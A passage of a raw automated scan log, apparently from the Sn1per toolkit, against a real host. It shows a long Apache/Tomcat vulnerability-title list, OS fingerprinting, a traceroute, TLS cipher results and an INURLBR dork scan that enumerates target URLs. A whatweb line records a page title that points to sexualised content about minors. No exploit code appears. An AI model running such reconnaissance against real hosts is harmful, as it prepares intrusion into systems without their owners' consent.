16019| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16020| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16021| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16022| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16023| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16024| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16025| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16026| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16027| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16028| [24365] Apache Struts Multiple Function Error Message XSS
16029| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16030| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16031| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16032| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16033| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16034| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16035| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16036| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16037| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16038| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16039| [22459] Apache Geronimo Error Page XSS
16040| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16041| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16042| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16043| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16044| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16045| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16046| [21021] Apache Struts Error Message XSS
16047| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16048| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16049| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16050| [20439] Apache Tomcat Directory Listing Saturation DoS
16051| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16052| [20285] Apache HTTP Server Log File Control Character Injection
16053| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16054| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16055| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16056| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16057| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16058| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16059| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16060| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16061| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16062| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16063| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16064| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16065| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16066| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16067| [18233] Apache HTTP Server htdigest user Variable Overfow
16068| [17738] Apache HTTP Server HTTP Request Smuggling
16069| [16586] Apache HTTP Server Win32 GET Overflow DoS
16070| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16071| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16072| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16073| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16074| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16075| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16076| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16077| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16078| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16079| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16080| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16081| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16082| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16083| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16084| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16085| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16086| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16087| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16088| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16089| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16090| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16091| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16092| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16093| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16094| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16095| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16096| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16097| [13304] Apache Tomcat realPath.jsp Path Disclosure
16098| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16099| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16100| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16101| [12848] Apache HTTP Server htdigest realm Variable Overflow
16102| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
16103| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
16104| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
16105| [12557] Apache HTTP Server prefork MPM accept Error DoS
16106| [12233] Apache Tomcat MS-DOS Device Name Request DoS
16107| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
16108| [12231] Apache Tomcat web.xml Arbitrary File Access
16109| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
16110| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
16111| [12178] Apache Jakarta Lucene results.jsp XSS
16112| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
16113| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
16114| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
16115| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
16116| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
16117| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
16118| [10471] Apache Xerces-C++ XML Parser DoS
16119| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
16120| [10068] Apache HTTP Server htpasswd Local Overflow
16121| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
16122| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
16123| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
16124| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
16125| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
16126| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
16127| [9717] Apache HTTP Server mod_cookies Cookie Overflow
16128| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
16129| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
16130| [9714] Apache Authentication Module Threaded MPM DoS
16131| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
16132| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
16133| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
16134| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
16135| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
16136| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
16137| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
16138| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
16139| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
16140| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
16141| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
16142| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
16143| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
16144| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
16145| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
16146| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
16147| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
16148| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
16149| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
16150| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
16151| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
16152| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
16153| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
16154| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
16155| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
16156| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
16157| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
16158| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
16159| [9208] Apache Tomcat .jsp Encoded Newline XSS
16160| [9204] Apache Tomcat ROOT Application XSS
16161| [9203] Apache Tomcat examples Application XSS
16162| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
16163| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
16164| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
16165| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
16166| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
16167| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
16168| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
16169| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
16170| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
16171| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
16172| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
16173| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
16174| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
16175| [7611] Apache HTTP Server mod_alias Local Overflow
16176| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
16177| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
16178| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
16179| [6882] Apache mod_python Malformed Query String Variant DoS
16180| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
16181| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
16182| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
16183| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
16184| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
16185| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
16186| [5526] Apache Tomcat Long .JSP URI Path Disclosure
16187| [5278] Apache Tomcat web.xml Restriction Bypass
16188| [5051] Apache Tomcat Null Character DoS
16189| [4973] Apache Tomcat servlet Mapping XSS
16190| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
16191| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
16192| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
16193| [4568] mod_survey For Apache ENV Tags SQL Injection
16194| [4553] Apache HTTP Server ApacheBench Overflow DoS
16195| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
16196| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
16197| [4383] Apache HTTP Server Socket Race Condition DoS
16198| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
16199| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
16200| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
16201| [4231] Apache Cocoon Error Page Server Path Disclosure
16202| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
16203| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
16204| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
16205| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
16206| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
16207| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
16208| [3322] mod_php for Apache HTTP Server Process Hijack
16209| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
16210| [2885] Apache mod_python Malformed Query String DoS
16211| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
16212| [2733] Apache HTTP Server mod_rewrite Local Overflow
16213| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
16214| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
16215| [2149] Apache::Gallery Privilege Escalation
16216| [2107] Apache HTTP Server mod_ssl Host: Header XSS
16217| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
16218| [1833] Apache HTTP Server Multiple Slash GET Request DoS
16219| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
16220| [872] Apache Tomcat Multiple Default Accounts
16221| [862] Apache HTTP Server SSI Error Page XSS
16222| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
16223| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
16224| [845] Apache Tomcat MSDOS Device XSS
16225| [844] Apache Tomcat Java Servlet Error Page XSS
16226| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
16227| [838] Apache HTTP Server Chunked Encoding Remote Overflow
16228| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
16229| [775] Apache mod_python Module Importing Privilege Function Execution
16230| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
16231| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
16232| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
16233| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
16234| [637] Apache HTTP Server UserDir Directive Username Enumeration
16235| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
16236| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
16237| [562] Apache HTTP Server mod_info /server-info Information Disclosure
16238| [561] Apache Web Servers mod_status /server-status Information Disclosure
16239| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
16240| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
16241| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
16242| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
16243| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
16244| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
16245| [376] Apache Tomcat contextAdmin Arbitrary File Access
16246| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
16247| [222] Apache HTTP Server test-cgi Arbitrary File Access
16248| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
16249| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
16250|_
16251Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
16252Device type: general purpose|broadband router|WAP|webcam
16253Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
16254OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
16255Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
16256No exact OS matches for host (test conditions non-ideal).
16257Uptime guess: 30.015 days (since Fri Sep 6 00:04:24 2019)
16258Network Distance: 14 hops
16259TCP Sequence Prediction: Difficulty=263 (Good luck!)
16260IP ID Sequence Generation: All zeros
16261
16262TRACEROUTE (using port 443/tcp)
16263HOP RTT ADDRESS
162641 45.71 ms 10.246.204.1
162652 48.13 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
162663 31.50 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
162674 30.60 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
162685 46.28 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
162696 63.01 ms be2090.ccr22.ymq01.atlas.cogentco.com (154.54.45.117)
162707 121.22 ms be3042.ccr21.lpl01.atlas.cogentco.com (154.54.44.161)
162718 139.32 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
162729 139.36 ms be3434.rcr21.ams06.atlas.cogentco.com (154.54.59.50)
1627310 139.43 ms worldstream.demarc.cogentco.com (149.14.93.114)
1627411 139.55 ms 109.236.95.179
1627512 139.54 ms 190.2.158.153
1627613 139.46 ms 185.106.120.66
1627714 139.70 ms latina.petite.guru (185.82.200.52)
16278
16279NSE: Script Post-scanning.
16280Initiating NSE at 00:26
16281Completed NSE at 00:26, 0.00s elapsed
16282Initiating NSE at 00:26
16283Completed NSE at 00:26, 0.00s elapsed
16284######################################################################################################################################
16285https://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
16286######################################################################################################################################
16287Version: 1.11.13-static
16288OpenSSL 1.0.2-chacha (1.0.2g-dev)
16289
16290Connected to 185.82.200.52
16291
16292Testing SSL server www.ygmt.info on port 443 using SNI name www.ygmt.info
16293
16294 TLS Fallback SCSV:
16295Server supports TLS Fallback SCSV
16296
16297 TLS renegotiation:
16298Secure session renegotiation supported
16299
16300 TLS Compression:
16301Compression disabled
16302
16303 Heartbleed:
16304TLS 1.2 not vulnerable to heartbleed
16305TLS 1.1 not vulnerable to heartbleed
16306TLS 1.0 not vulnerable to heartbleed
16307
16308 Supported Server Cipher(s):
16309Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
16310Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
16311Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
16312Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
16313Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
16314Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
16315Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
16316Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
16317Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16318Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16319Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16320Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16321Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16322Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16323Accepted TLSv1.2 256 bits CAMELLIA256-SHA
16324Accepted TLSv1.2 256 bits AES256-SHA
16325Accepted TLSv1.2 128 bits CAMELLIA128-SHA
16326Accepted TLSv1.2 128 bits AES128-SHA
16327Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16328Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16329Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16330Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16331Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16332Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16333Accepted TLSv1.1 256 bits CAMELLIA256-SHA
16334Accepted TLSv1.1 256 bits AES256-SHA
16335Accepted TLSv1.1 128 bits CAMELLIA128-SHA
16336Accepted TLSv1.1 128 bits AES128-SHA
16337Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16338Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16339Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16340Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16341Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16342Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16343Accepted TLSv1.0 256 bits CAMELLIA256-SHA
16344Accepted TLSv1.0 256 bits AES256-SHA
16345Accepted TLSv1.0 128 bits CAMELLIA128-SHA
16346Accepted TLSv1.0 128 bits AES128-SHA
16347
16348 SSL Certificate:
16349Signature Algorithm: sha256WithRSAEncryption
16350RSA Key Strength: 2048
16351
16352Subject: ygmt.info
16353Altnames: DNS:ygmt.info, DNS:www.ygmt.info
16354Issuer: COMODO RSA Domain Validation Secure Server CA
16355
16356Not valid before: Feb 14 00:00:00 2017 GMT
16357Not valid after: Feb 14 23:59:59 2018 GMT
16358######################################################################################################################################
16359------------------------------------------------------------------------------------------------------------------------
16360
16361[ ! ] Starting SCANNER INURLBR 2.1 at [06-10-2019 00:27:04]
16362[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
16363It is the end user's responsibility to obey all applicable local, state and federal laws.
16364Developers assume no liability and are not responsible for any misuse or damage caused by this program
16365
16366[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
16367[ INFO ][ DORK ]::[ site:www.ygmt.info ]
16368[ INFO ][ SEARCHING ]:: {
16369[ INFO ][ ENGINE ]::[ GOOGLE - www.google.gm ]
16370
16371[ INFO ][ SEARCHING ]::
16372-[:::]
16373[ INFO ][ ENGINE ]::[ GOOGLE API ]
16374
16375[ INFO ][ SEARCHING ]::
16376-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
16377[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.mu ID: 003917828085772992913:gmoeray5sa8 ]
16378
16379[ INFO ][ SEARCHING ]::
16380-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
16381
16382[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
16383
16384
16385 _[ - ]::--------------------------------------------------------------------------------------------------------------
16386|_[ + ] [ 0 / 100 ]-[00:27:16] [ - ]
16387|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats ]
16388|_[ + ] Exploit::
16389|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16390|_[ + ] More details:: / - / , ISP:
16391|_[ + ] Found:: UNIDENTIFIED
16392
16393 _[ - ]::--------------------------------------------------------------------------------------------------------------
16394|_[ + ] [ 1 / 100 ]-[00:27:17] [ - ]
16395|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?cat=Free Sites ]
16396|_[ + ] Exploit::
16397|_[ + ] Information Server:: HTTP/1.1 400 Bad Request, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16398|_[ + ] More details:: / - / , ISP:
16399|_[ + ] Found:: UNIDENTIFIED
16400
16401 _[ - ]::--------------------------------------------------------------------------------------------------------------
16402|_[ + ] [ 2 / 100 ]-[00:27:18] [ - ]
16403|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=68 ]
16404|_[ + ] Exploit::
16405|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16406|_[ + ] More details:: / - / , ISP:
16407|_[ + ] Found:: UNIDENTIFIED
16408
16409 _[ - ]::--------------------------------------------------------------------------------------------------------------
16410|_[ + ] [ 3 / 100 ]-[00:27:18] [ - ]
16411|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=40 ]
16412|_[ + ] Exploit::
16413|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16414|_[ + ] More details:: / - / , ISP:
16415|_[ + ] Found:: UNIDENTIFIED
16416
16417 _[ - ]::--------------------------------------------------------------------------------------------------------------
16418|_[ + ] [ 4 / 100 ]-[00:27:19] [ - ]
16419|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=38 ]
16420|_[ + ] Exploit::
16421|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16422|_[ + ] More details:: / - / , ISP:
16423|_[ + ] Found:: UNIDENTIFIED
16424
16425 _[ - ]::--------------------------------------------------------------------------------------------------------------
16426|_[ + ] [ 5 / 100 ]-[00:27:20] [ - ]
16427|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=108 ]
16428|_[ + ] Exploit::
16429|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16430|_[ + ] More details:: / - / , ISP:
16431|_[ + ] Found:: UNIDENTIFIED
16432
16433 _[ - ]::--------------------------------------------------------------------------------------------------------------
16434|_[ + ] [ 6 / 100 ]-[00:27:20] [ - ]
16435|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=63 ]
16436|_[ + ] Exploit::
16437|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16438|_[ + ] More details:: / - / , ISP:
16439|_[ + ] Found:: UNIDENTIFIED
16440
16441 _[ - ]::--------------------------------------------------------------------------------------------------------------
16442|_[ + ] [ 7 / 100 ]-[00:27:21] [ - ]
16443|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93 ]
16444|_[ + ] Exploit::
16445|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16446|_[ + ] More details:: / - / , ISP:
16447|_[ + ] Found:: UNIDENTIFIED
16448
16449 _[ - ]::--------------------------------------------------------------------------------------------------------------
16450|_[ + ] [ 8 / 100 ]-[00:27:22] [ - ]
16451|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=92 ]
16452|_[ + ] Exploit::
16453|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16454|_[ + ] More details:: / - / , ISP:
16455|_[ + ] Found:: UNIDENTIFIED
16456
16457 _[ - ]::--------------------------------------------------------------------------------------------------------------
16458|_[ + ] [ 9 / 100 ]-[00:27:22] [ - ]
16459|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1 ]
16460|_[ + ] Exploit::
16461|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16462|_[ + ] More details:: / - / , ISP:
16463|_[ + ] Found:: UNIDENTIFIED
16464
16465 _[ - ]::--------------------------------------------------------------------------------------------------------------
16466|_[ + ] [ 10 / 100 ]-[00:27:23] [ - ]
16467|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37 ]
16468|_[ + ] Exploit::
